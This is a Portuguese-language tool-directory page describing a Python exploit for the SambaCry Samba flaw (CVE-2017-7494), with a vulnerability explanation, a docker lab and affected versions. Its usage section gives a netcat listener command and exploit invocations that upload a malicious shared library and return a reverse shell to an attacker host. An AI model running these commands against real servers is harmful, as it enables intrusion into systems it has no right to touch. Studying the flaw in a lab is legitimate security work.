Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-7494 — Exploit em Python para CVE-2017-7494 (SambaCry) que demonstra execução remota de código autenticada ao enviar uma biblioteca compartilhada maliciosa para um compartilhamento Samba e acionar o seu carregamento via dlopen. | Kitploit
Ferramentas/GitHubGitHub/yonliud/cve-2017-7494
Análise de VulnerabilidadesExploraçãoAprendizado e EducaçãoLabs e Prática
GitHubyonliud/cve-2017-7494

CVE-2017-7494

Exploit em Python para CVE-2017-7494 (SambaCry) que demonstra execução remota de código autenticada ao enviar uma biblioteca compartilhada maliciosa para um compartilhamento Samba e acionar o seu carregamento via dlopen.

Ver Repositório
2há 4 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do SambaCry (CVE-2017-7494)

CVE-2017-7494/SambaCry permite que usuários autenticados enviem uma biblioteca compartilhada para uma pasta gravável e realizem ataques de execução usando as bibliotecas enviadas.

Explicação da vulnerabilidade

SambaCry é uma vulnerabilidade de validação de caminho na forma como o Samba lida com solicitações de named-pipe. Normalmente, esses pipes são usados para permitir que programas se comuniquem entre si lendo e gravando dados por meio de um canal semelhante a um arquivo.

Quando o Samba recebe um nome de pipe desconhecido, versões vulneráveis podem tratá-lo como o nome de um módulo carregável dinamicamente. Esses módulos geralmente são bibliotecas .so legítimas instaladas pelo administrador.

A vulnerabilidade permite que um cliente forneça um caminho absoluto do sistema de arquivos em vez de um nome normal de módulo ou pipe. O Samba não restringe adequadamente esse caminho e pode efetivamente executar: dlopen("/data/example.so", ...);.

Carregar uma biblioteca compartilhada executa seu código de inicialização. Portanto, um atacante que consiga enviar um arquivo .so malicioso para um local gravável pode fazer o serviço Samba carregá-lo, resultando em execução remota de código.

Demonstração

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Uso

  1. Inicialize um listener:
root@kitploit:~
nc -lvnp 4444
  1. Execute o processo completo
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Para acionar um payload já enviado:

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. No terminal do listener. Uma shell deve aparecer.

Ambiente de Laboratório

Usando o docker-compose.yml pré-configurado para inicializar o laboratório vulnerável.

root@kitploit:~
docker compose up -d

O laboratório usa o Samba 4.5.9, que é vulnerável a essa vulnerabilidade.

Versões afetadas

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

Baixar ferramenta